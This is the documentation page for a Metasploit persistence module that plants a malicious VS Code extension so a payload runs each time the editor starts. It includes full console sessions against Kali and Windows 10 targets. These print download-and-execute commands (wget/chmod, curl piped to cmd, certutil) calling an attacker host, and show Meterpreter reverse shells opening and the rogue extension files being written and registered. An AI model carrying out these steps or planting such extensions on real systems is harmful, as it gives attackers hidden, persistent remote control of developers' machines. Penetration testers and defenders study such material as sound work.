documentation/modules/exploit/multi/persistence/vscode_extension.md
This module installs a malicious VS Code extension into the target's VS Code extensions directory. The extension executes the payload each time VS Code is launched, providing persistent code execution. Supports VS Code, VS Code Insiders, VSCodium, VS Code Server, and Cursor.
Tested against 1.120.0 on Kali and Windows 10
use exploit/multi/persistence/vscode_extensionrunName of the extension (Random if left blank). Defaults to ``.
Publisher name for the extension (Random if left blank). Defaults to ``.
Description of the extension (Random if left blank). Defaults to ``.
User to target, or current user if blank (Random if left blank). Defaults to ``.
Local path to an icon file (PNG) to include with the extension. Defaults to no icon
Original Shell
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO jNobBPgs --no-check-certificate http://1.1.1.1:8082/l; chmod +x jNobBPgs; ./jNobBPgs& disown
msf exploit(multi/script/web_delivery) >
[*] 1.1.1.1 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:60886) at 2026-05-15 08:54:57 -0400
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: h00die
meterpreter > sysinfo
Computer : h00die-kali
OS : Debian (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
Persistence
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/vscode_extension
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > set session 1
session => 1
msf exploit(multi/persistence/vscode_extension) > set target 1
target => 1
msf exploit(multi/persistence/vscode_extension) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > exploit
[*] Command to run on remote host: curl -so ./iMMtopaQ http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./iMMtopaQ;./iMMtopaQ&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/vscode_extension) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target user: h00die
[+] The target appears to be vulnerable. VS Code extensions directory found: /root/.vscode/extensions
[*] Using extension: fkhtvcu.cjfkvxfx-1.0.0
[*] Target user: h00die
[*] Installing to: /root/.vscode/extensions
[*] Creating extension directory: /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0
[*] Creating directory /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0
[*] /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0 created
[+] Wrote package.json to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/package.json
[+] Wrote extension.js to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/extension.js
[+] Wrote payload to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/external
[*] Reading extensions.json...
[+] Registered extension in /root/.vscode/extensions/extensions.json
[!] VS Code is currently running - restart VS Code to activate the extension.
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260515.5724/h00die-kali_20260515.5724.rc
[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
[*] Sending payload to 1.1.1.1 (curl/8.19.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:60160) at 2026-05-15 08:57:46 -0400
Original shell
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/sDEHsFj37VRR4ySrr8_b_w & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /sDEHsFj37VRR4ySrr8_b_w
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/8.13.0)
[*] Client 2.2.2.2 requested /sDEHsFj37VRR4ySrr8_b_w
[*] Sending payload to 2.2.2.2 (curl/8.13.0)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:64885) at 2026-05-15 08:37:21 -0400
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-3PTMHF3\h00die
meterpreter > sysinfo
Computer : DESKTOP-3PTMHF3
OS : Windows 10 22H2+ (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
Persistence
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/vscode_extension
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > set target 0
target => 0
msf exploit(multi/persistence/vscode_extension) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > set session 1
session => 1
msf exploit(multi/persistence/vscode_extension) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\VGCHkxyx.exe & start /B %TEMP%\VGCHkxyx.exe
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /Jy5WA3Epc63uV93PB0rHzw
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(multi/persistence/vscode_extension) > [*] Running automatic check ("set AutoCheck false" to disable)
[*] Target user: h00die
[+] The target appears to be vulnerable. VS Code extensions directory found: C:\Users\h00die\.vscode\extensions
[*] Using extension: oiok.niuvribguy-1.0.0
[*] Target user: h00die
[*] Installing to: C:\Users\h00die\.vscode\extensions
[*] Creating extension directory: C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0
[*] Creating directory C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0
[*] C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0 created
[+] Wrote package.json to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\package.json
[+] Wrote extension.js to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\extension.js
[+] Wrote payload to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\external
[*] Reading extensions.json...
[+] Registered extension in C:\Users\h00die\.vscode\extensions\extensions.json
[*] VS Code is not running - launch it to trigger the extension.
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/DESKTOP-3PTMHF3_20260515.4157/DESKTOP-3PTMHF3_20260515.4157.rc
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (248902 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:65022) at 2026-05-15 08:42:16 -0400